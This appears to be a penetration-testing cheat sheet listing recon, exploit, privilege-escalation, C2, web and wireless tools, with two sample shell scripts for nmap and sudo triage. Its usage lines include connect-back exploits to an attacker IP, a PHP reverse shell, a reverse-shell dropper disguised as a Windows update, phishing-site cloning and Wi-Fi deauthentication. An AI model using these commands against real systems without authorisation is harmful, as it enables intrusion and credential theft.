Information Gathering / Enumeration
Tool/Technique | Link | Description | Command/Example |
---|---|---|---|
NMAP – Network Mapper | https://nmap.org/ (NSEDoc Reference Portal; Nmap Cheat Sheet: Usage and Examples; Nmap Network Scanning: Firewall/IDS Evasion and Spoofing) | Nmap discovers hosts and services on a network by sending packets and analysing the responses. | nmap -sC -sV -p- --min-rate 10000 <target-ip> -oN output (--min-rate 10000 is fast but noisy and can miss ports on lossy links; lower it if results look incomplete) |
Batea | https://github.com/delvelabs/batea | Batea lets security teams automatically rank the most interesting network assets in large networks from nmap scan reports (XML output). | # Complete info: sudo nmap -A 192.168.0.0/16 -oX output.xml # Partial info: sudo nmap -O -sV 192.168.0.0/16 -oX output.xml # then feed output.xml to batea |
Binwalk | https://github.com/ReFirmLabs/binwalk | Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images. | # Extract any file that it finds binwalk -e firmware.bin |
Blackeye | https://github.com/An0nUD4Y/blackeye https://www.geeksforgeeks.org/blackeye-phishing-tool-in-kali-linux/ | Creates cloned phishing websites to harvest credentials (for authorised social-engineering engagements). | https://www.geeksforgeeks.org/blackeye-phishing-tool-in-kali-linux/ |
Censys | https://censys.io/ | Censys reduces your Internet attack surface by continually discovering unknown assets and helping remediate Internet facing risks | https://search.censys.io/ |
Shodan | https://www.shodan.io/ | Search Engine for the Internet of Everything | apache country:no port:80 http.status:200 |
Dig | https://www.hostinger.com/tutorials/how-to-use-the-dig-command-in-linux/ | Dig (Domain Information Groper) is a command-line utility that performs DNS lookups by querying name servers and displaying the result. | dig [@server] <name> [type] (server is optional and prefixed with @; type defaults to A) |
DNSdumpster | https://dnsdumpster.com/ | DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. | Search for domain. |
Enum4Linux | https://github.com/CiscoCXSecurity/enum4linux | Enum4linux is a tool for enumerating information from Windows and Samba systems | enum4linux -a host |
EyeWitness | https://github.com/FortyNorthSecurity/EyeWitness | EyeWitness takes screenshots of websites, records server header info, and identifies default credentials where known. | ./EyeWitness.py -f urls.txt --web |
Insomnia | https://insomnia.rest/ | Run API queries with GUI | See website |
Masscan | https://github.com/robertdavidgraham/masscan | Internet-scale port scanner: it can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second from a single machine. | # Scans the entire Internet (only with an exclude list of ranges you are not authorised to touch, and a --rate you can sustain) masscan 0.0.0.0/0 -p0-65535 |
Maltego | https://www.maltego.com/product-features/?utm_source=paterva.com&utm_medium=referral&utm_campaign=301 | Maltego is a very powerful OSINT and data-mining tool that offers an endless combination of search transforms and strategies, rendered as link graphs. | GUI; see website |
SIPvicious suite | https://github.com/EnableSecurity/sipvicious | SIPVicious OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password. | See github for full documentation |
Steghide | http://steghide.sourceforge.net/ | Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files. | $ steghide embed -cf picture.jpg -ef secret.txt Enter passphrase: Re-Enter passphrase: embedding "secret.txt" in "picture.jpg"... done |
ODAT – Oracle Database Attacking Tool | https://github.com/quentinhardy/odat | ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely. | See github. |
theHarvester | https://github.com/laramies/theHarvester | Gathers names, emails, IPs, subdomains, and URLs from public sources (search engines, certificate transparency, etc.). | theHarvester -d megacorpone.com -b google (or -b all) |
Social searcher | https://www.social-searcher.com/ | Free Social Media Search Engine | n/a |
Sn1per | https://github.com/1N3/Sn1per | Discover hidden assets and vulnerabilities in your environment | See github |
gitleaks | https://github.com/gitleaks/gitleaks | Gitleaks is a SAST tool for detecting and preventing hardcoded secrets like passwords, API keys, and tokens in git repos (scans the full history, not just the working tree). | gitleaks detect --source . -v |
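The first row's nmap command is usually run as the second half of a two-phase workflow: a fast, all-port discovery scan, then scripts and version detection (-sC -sV) only on the ports found open, which keeps the noisy phase short and the slow phase targeted. The script below is an added example, not taken from the original page or from the Nmap project; the parser runs offline against a constructed grepable (-oG) report, the target 10.10.10.5 is a placeholder, and the real scans only run when RUN_SCAN=1 is set and nmap is installed.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): two-phase nmap workflow.
# Phase 1: fast full-range discovery (-p- --min-rate) saved in grepable format.
# Phase 2: default scripts + version detection (-sC -sV) only on the ports found open.
set -euo pipefail

# Print the ports marked "open" in an nmap grepable (-oG) report, comma-separated,
# which is the form nmap's -p switch accepts. Filtered/closed ports are ignored.
open_ports_from_gnmap() {
    grep -oE '[0-9]+/open/' "$1" | cut -d/ -f1 | sort -un | paste -sd, -
}

# Run both phases against one target. Assumes nmap is installed and that you are
# authorised to scan the target; report files are named after the target.
two_phase_scan() {
    local target=$1 ports
    nmap -p- --min-rate 10000 -oG "discovery_${target}.gnmap" "$target" >/dev/null
    ports=$(open_ports_from_gnmap "discovery_${target}.gnmap" || true)
    [ -n "$ports" ] || { echo "no open ports found on $target" >&2; return 1; }
    nmap -sC -sV -p "$ports" -oN "services_${target}.txt" "$target"
}

# Constructed sample of a phase-1 report (placeholder host, not a real scan result),
# so the parser can be exercised without running nmap.
SAMPLE_GNMAP=$(mktemp)
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -p- --min-rate 10000 -oG discovery_10.10.10.5.gnmap 10.10.10.5
Host: 10.10.10.5 ()	Status: Up
Host: 10.10.10.5 ()	Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 445/open/tcp//microsoft-ds///, 8080/filtered/tcp//http-proxy///	Ignored State: closed (65531)
# Nmap done -- 1 IP address (1 host up) scanned
EOF

echo "ports to rescan: $(open_ports_from_gnmap "$SAMPLE_GNMAP")"   # 22,80,445

# Only perform real scans when explicitly requested: RUN_SCAN=1 ./two_phase.sh 10.10.10.5
if [ "${RUN_SCAN:-0}" = 1 ]; then
    two_phase_scan "${1:?usage: RUN_SCAN=1 $0 <target>}"
fi
```

The same parser works on a masscan run saved with -oG, so masscan can take over phase 1 on large ranges while nmap still does the service scan.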
Exploitation
Tool | Link | Description | Command/Example |
---|---|---|---|
MS17-010 | https://github.com/helviojunior/MS17-010 https://github.com/worawit/MS17-010 | Repository for EternalBlue exploit. | See repository. |
MS10-059 (Chimichurri) | https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri | Windows local privilege escalation via the Tracing Feature for Services (KB982799); a privesc exploit rather than remote exploitation. | See MS10-059 Chimichurri under Privilege Escalation below. |
Infection Monkey | https://www.guardicore.com/infectionmonkey/ | Infection Monkey is a free, open-source breach and attack simulation tool that uses real-world attack techniques and known vulnerabilities to test network segmentation and resilience. | https://woodward.digital/infection-monkey-network-penetration-testing/?v=c2f3f489a005 |
Metasploit | https://www.offensive-security.com/metasploit-unleashed/exploits/ | Exploitation framework with a large library of exploit, payload, auxiliary and post-exploitation modules. | msfconsole |
Windows-php-reverse-shell | https://github.com/Dhayalanb/windows-php-reverse-shell | Simple PHP reverse shell for Windows targets, implemented with a bundled binary and based on a webshell. | Usage: change the IP and port in windows-php-reverse-shell.php, upload it, start a listener on your machine, then browse to the uploaded file on the server |
SQLmap | https://github.com/sqlmapproject/sqlmap | sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. | To get a list of basic options and switches use:python sqlmap.py -h |
IIS 6.0 BOF – RCE | https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269 | CVE-2017-7269 – buffer overflow in the ScStoragePathFromUrl function of the WebDAV service in IIS 6.0 (Windows Server 2003 R2), giving remote code execution. | python2 exploit.py targetip targetport srcip srcport |
Drupalgeddon2 | https://github.com/dreadlocked/Drupalgeddon2 | Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002 | ruby drupalgeddon2.rb TARGET |
Windows Kernel Exploit List | https://github.com/SecWiki/windows-kernel-exploits | List of Kernel exploits | See github |
Password Crackers
Tool | Link | Description | Command/Example |
---|---|---|---|
Hashcat | https://hashcat.net/hashcat/ | Hashcat is a password cracking tool. | See CheatSheet |
Hydra | https://github.com/vanhauser-thc/thc-hydra | This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. | See CheatSheet |
Privilege Escalation
Tool | Link | OS | Description | Command/Example |
---|---|---|---|---|
BeRoot Project | https://github.com/AlessandroZ/BeRoot | Windows/Linux | BeRoot Project is a post-exploitation tool that checks common misconfigurations to find a way to escalate privileges. | # Windows: beRoot.exe [-h] [-l] # Linux: python beroot.py |
Deepce | https://github.com/stealthcopter/deepce | Linux (Docker containers) | Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) | # Make the script executable and then run it chmod +x ./deepce.sh ./deepce.sh |
GTFObins | https://gtfobins.github.io/ | UNIX | GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. | See website. |
LinEnum | https://github.com/rebootuser/LinEnum | Linux | List possible PrivEsc Vectors | See github |
linPEAS | https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS | Linux | List possible privesc vectors | ./linpeas.sh |
winPEAS | https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS | Windows | List possible privesc vectors | winpeas.exe or winpeas.bat |
linuxprivchecker | https://github.com/linted/linuxprivchecker | Linux | List possible privesc vectors | https://github.com/linted/linuxprivchecker/blob/master/linuxprivchecker.py |
linux-exploit-suggester | https://github.com/mzet-/linux-exploit-suggester | Linux | Lists kernel/userspace exploits likely to apply to the target's kernel version and distribution. Run on the target. | ./linux-exploit-suggester.sh |
windows-exploit-suggester | https://github.com/AonCyberLabs/Windows-Exploit-Suggester | Windows | Lists missing patches and matching public exploits by comparing the target's patch level (its systeminfo output) against Microsoft's bulletin database. Runs on the attacker machine; only the systeminfo output is needed from the target, and the .xlsx database is fetched with the script's --update switch first. | ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt |
PowerSploit\PowerUp.ps1 | https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc | Windows | PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. | See the GitHub repository for full usage. To execute on target, see my cheatsheet. |
PowerSploit\PowerView.ps1 | https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | Windows | PowerView is a series of functions that perform network and Windows domain enumeration and exploitation. | See the GitHub repository for full usage. To execute on target, see my cheatsheet. |
Juicy Potato | https://github.com/ohpe/juicy-potato | Windows | RottenPotatoNG and its variants leverage a privilege escalation chain based on the BITS service having a MitM listener on 127.0.0.1:6666, usable when you hold the SeImpersonate or SeAssignPrimaryToken privilege (typically service accounts such as IIS or MSSQL). | See github (requires a CLSID valid for the target's Windows version) |
MS10-059 Chimichurri | https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri | Windows | Vulnerabilities in the Tracing Feature for Services Could Allow an Elevation of Privilege (982799) | chimichurri.exe attackerip attackerport |
Polkit CVE-2021-4034 (PwnKit) | https://github.com/joeammond/CVE-2021-4034 | Linux | Local privilege escalation in polkit's pkexec, a SUID-root program installed by default on every major Linux distribution. | python3 cve-2021-4034.py (run on the target to get a root shell) |
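LinEnum, linPEAS and GTFOBins together cover one workflow: enumerate what the low-privilege user can run with elevated rights (sudo rules, SUID binaries, file capabilities), then look each candidate up on GTFOBins for a known escape. The script below is an added example, not taken from the original page or from any of those projects; it parses a constructed sample of `sudo -l` output (the user, hostname and rules are placeholders), builds the matching GTFOBins lookup URLs, and keeps the live SUID/capability checks in functions you call on the target.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): manual privesc triage that mirrors
# what LinEnum/linPEAS automate, then hands each finding to GTFOBins.
set -euo pipefail

# Extract commands runnable via sudo WITHOUT a password from `sudo -l` output.
# Rule lines look like "(ALL) NOPASSWD: /usr/bin/vim, /usr/bin/find"; print one command per line.
sudo_nopasswd_cmds() {
    grep 'NOPASSWD:' "$1" \
        | sed -E 's/.*NOPASSWD: *//' \
        | tr ',' '\n' \
        | sed -E 's/^ +//; s/ +$//' \
        | grep -v '^$'
}

# GTFOBins pages are keyed by binary name, with one anchor per context (#sudo, #suid, #capabilities).
gtfobins_url() {
    printf 'https://gtfobins.github.io/gtfobins/%s/#%s\n' "$(basename "$1")" "$2"
}

# Live checks, run on the target as the low-privilege user; unreadable paths are silenced.
suid_binaries() { find / -perm -4000 -type f 2>/dev/null; }
file_capabilities() { getcap -r / 2>/dev/null; }

# Constructed sample of `sudo -l` output (placeholder user/host/rules, not a real system).
SAMPLE_SUDO=$(mktemp)
cat > "$SAMPLE_SUDO" <<'EOF'
Matching Defaults entries for www-data on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/find, /usr/bin/env
    (ALL : ALL) /usr/bin/less
EOF

# Every NOPASSWD entry is a candidate: print it with its GTFOBins page for the sudo context.
# (/usr/bin/less is deliberately excluded: it still needs the user's password.)
sudo_nopasswd_cmds "$SAMPLE_SUDO" | while read -r cmd; do
    echo "$cmd -> $(gtfobins_url "$cmd" sudo)"
done

# On a real target:
#   sudo -l > sudo.txt && sudo_nopasswd_cmds sudo.txt
#   suid_binaries        # check each basename at .../#suid
#   file_capabilities    # check cap_setuid/cap_dac_read_search entries at .../#capabilities
```

Checking the GTFOBins page before running anything matters: the same binary escalates differently under sudo, SUID and capabilities, and a SUID copy of a binary that drops privileges (bash without -p, for example) will not give a root shell.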
Post-Exploitation
Tool | Link | Description | Command/Example |
---|---|---|---|
C2 – Covenant | https://github.com/cobbr/Covenant | Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. | https://github.com/cobbr/Covenant/wiki/Installation-And-Startup |
C2 – PoshC2 | https://github.com/nettitude/PoshC2 | PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. | See github |
C2 – Cobalt Strike | https://www.cobaltstrike.com/ | Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer’s network. | https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_main.htm?cshid=1085 |
C2 – Empire | https://github.com/EmpireProject/Empire | Empire is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent. The original project is archived; the maintained fork is BC-SECURITY's Empire. | http://www.powershellempire.com/?page_id=83 |
C2 – Starkiller (Empire frontend) | https://github.com/BC-SECURITY/Starkiller | Starkiller is a Frontend for Powershell Empire. | ./starkiller-<version>.AppImage --no-sandbox |
C2 – meterpeter | https://github.com/r00t-3xp10it/meterpeter | This PS1 script starts a listener on a Windows or Linux attacker machine and generates one-liner PowerShell reverse-shell payloads, obfuscated with BXOR under a random secret key plus a layer of character/variable obfuscation, to be executed on the victim machine. | Deliver the dropper 'Update-KB4524147.zip' to the target via the 'Attack Vector URL' (served by apache2), unzip it (e.g. on the Desktop) and execute 'Update-KB4524147.bat' as Administrator. |
C2 – Alan Framework | https://github.com/enkomio/AlanFramework | Alan Framework is a post-exploitation framework useful during red-team activities. | https://www.youtube.com/watch?v=dgEBEAfEseY |
C2 – Sliver | https://github.com/BishopFox/sliver | Sliver is an open source cross-platform adversary emulation/red team framework that organisations of any size can use for security testing. | # Linux one-liner install: curl https://sliver.sh/install \| sudo bash, then run sliver |
Armitage | https://www.offensive-security.com/metasploit-unleashed/armitage/ | Armitage is a Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit. | https://www.offensive-security.com/metasploit-unleashed/armitage-exploitation/ |
Chisel | https://github.com/jpillora/chisel | Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. | $ chisel server --port $PORT --proxy http://example.com # listens on $PORT, proxy web requests to http://example.com |
sshuttle | https://github.com/sshuttle/sshuttle#sshuttle-where-transparent-proxy-meets-vpn-meets-ssh | sshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via ssh | sshuttle [options] -r [username@]sshserver[:port] <subnets …> |
ligolo-ng | https://github.com/tnpitsecurity/ligolo-ng | Ligolo-ng is a simple, lightweight and fast tool that lets pentesters establish tunnels from a reverse TCP/TLS connection using a tun interface (no SOCKS proxy needed, so normal tools work unchanged through the pivot). | See github |
C2 – Havoc | https://havocframework.com/ https://github.com/HavocFramework/Havoc | Havoc is a modern and malleable post-exploitation command and control framework created by @C5pider. At release it was demonstrated evading Microsoft Defender on Windows 11, a claim that is time-bound as detections catch up. | See github |
C2 – Brute Ratel | https://bruteratel.com/ | Brute Ratel C4: a customised command and control center for red team and adversary simulation (commercial; tagline "Badger doesn't care. It takes what it wants!"). | Commercial product; see vendor site |
Web Application
Tool | Link | Description | Command/Example |
---|---|---|---|
BurpSuite | https://portswigger.net/burp | Burp Suite is an intercepting proxy and framework of web application pentesting tools, used for manual and automated web app testing. | https://blog.aghanim.net/?p=732 |
Dirb | https://github.com/v0re/dirb https://www.kali.org/tools/dirb/ | DIRB is a web content scanner. It looks for existing (and/or hidden) web objects by brute-forcing paths from a wordlist. | dirb <url_base> [<wordlist_file(s)>] [options] |
Dirbpy | https://github.com/marcolivierbouch/dirbpy | A reimplementation of dirb in Python. It is faster than the C version because it uses threads. Dirbpy is a web content scanner that looks for hidden web objects. | dirbpy -o https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt -u https://[....].com |
Dirhunt | https://github.com/Nekmo/dirhunt | Dirhunt is a web crawler optimised for finding and analysing directories (directory listings, links in pages, robots.txt). | $ dirhunt http://website.com/ |
ffuf | https://github.com/ffuf/ffuf | A fast web fuzzer written in Go. | ffuf -w /path/to/wordlist -u https://target/FUZZ |
Feroxbuster | https://github.com/epi052/feroxbuster | feroxbuster is a tool designed to perform Forced Browsing. | ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx |
Gobuster | https://github.com/OJ/gobuster | Gobuster is a tool used to brute-force: URIs (directories and files) on web sites; DNS subdomains (with wildcard support); virtual host names on target web servers; open Amazon S3 buckets. | gobuster dir -u http://<target> -w <wordlist> |
Fuxploider | https://github.com/almandin/fuxploider | This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server. | python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type" |
FuzzDB | https://github.com/fuzzdb-project/fuzzdb | Increase the likelihood of finding application security vulnerabilities through dynamic application security testing. | https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints |
Nikto | https://github.com/sullo/nikto | Nikto is web server scanner | nikto -h <target> |
Raccoon | https://github.com/evyatarmeged/Raccoon | Offensive Security Tool for Reconnaissance and Information Gathering | Usage: raccoon [OPTIONS] TARGET |
Sublist3r | https://github.com/aboul3la/Sublist3r | Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. | To enumerate subdomains of specific domain:python sublist3r.py -d example.com |
Joomscan | https://github.com/OWASP/joomscan | Automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments | joomscan.pl [options] |
droopescan | https://github.com/SamJoan/droopescan | Plugin-based CMS scanner. Supported CMS: SilverStripe, WordPress, Drupal | droopescan scan drupal -u http://example.org/ -t 32 |
Crawleet | https://github.com/truerandom/crawleet | Web recon and exploitation tool. | python crawleet.py -u <URL> |
wafw00f | https://github.com/EnableSecurity/wafw00f | WAF fingerprinting: identifies which Web Application Firewall product (if any) is in front of a site, so you know what you need to bypass; it does not bypass it itself. | wafw00f http://target |
Active Directory Environment
Tool | Link | Description | Command/Example |
---|---|---|---|
BloodHoundAD | https://github.com/BloodHoundAD/BloodHound | BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. | https://bloodhound.readthedocs.io/en/latest/index.html |
Impacket | https://github.com/SecureAuthCorp/impacket | Impacket is a collection of Python classes for working with network protocols. NOT LIMITED TO AD ENVIRONMENT. | https://www.secureauth.com/labs/open-source-tools/impacket/ |
Nishang | https://github.com/samratashok/nishang | Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. NOT LIMITED TO AD ENVIRONMENT | See github |
PowerSploit | https://github.com/PowerShellMafia/PowerSploit | PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. NOT LIMITED TO AD ENVIRONMENT | See github |
Malware Analysis (MA) / Buffer Overflow (BOF)
Type | Tool | Link | Description | Command/Example |
---|---|---|---|---|
MA | Ghidra | https://ghidra-sre.org/ | A software reverse engineering (SRE) suite of tools developed by NSA’s Research Directorate in support of the Cybersecurity mission | https://github.com/NationalSecurityAgency/ghidra |
BOF | Python GDB PEDA | https://github.com/longld/peda | PEDA – Python Exploit Development Assistance for GDB | See Github |
WiFi / Wireless
Tool | Link | Description | Command/Example |
---|---|---|---|
Aircrack-ng | https://www.aircrack-ng.org/ | Aircrack-ng is a complete suite of tools to assess WiFi network security. Monitoring: packet capture and export of data to text files for further processing by third-party tools. Attacking: replay attacks, deauthentication, fake access points and others via packet injection. Testing: checking WiFi cards and driver capabilities (capture and injection). Cracking: WEP and WPA PSK (WPA 1 and 2). | # First, capture on the AP's channel to collect the WPA handshake: airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 # Then, in a second terminal, deauth a connected client so it re-associates and the handshake is captured: aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0 |
BoopSuite | https://github.com/MisterBianco/BoopSuite https://en.kali.tools/?p=462 | BoopSuite is a set of tools written in Python designed for wireless auditing and security testing. | BoopMon [-h] [-v] [-c [CHANNEL [CHANNEL ...]]] [-k] [-n NAME] -i {} [-m MAC] |
Kismet | https://www.kismetwireless.net/ | Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework. | https://github.com/kismetwireless/kismet |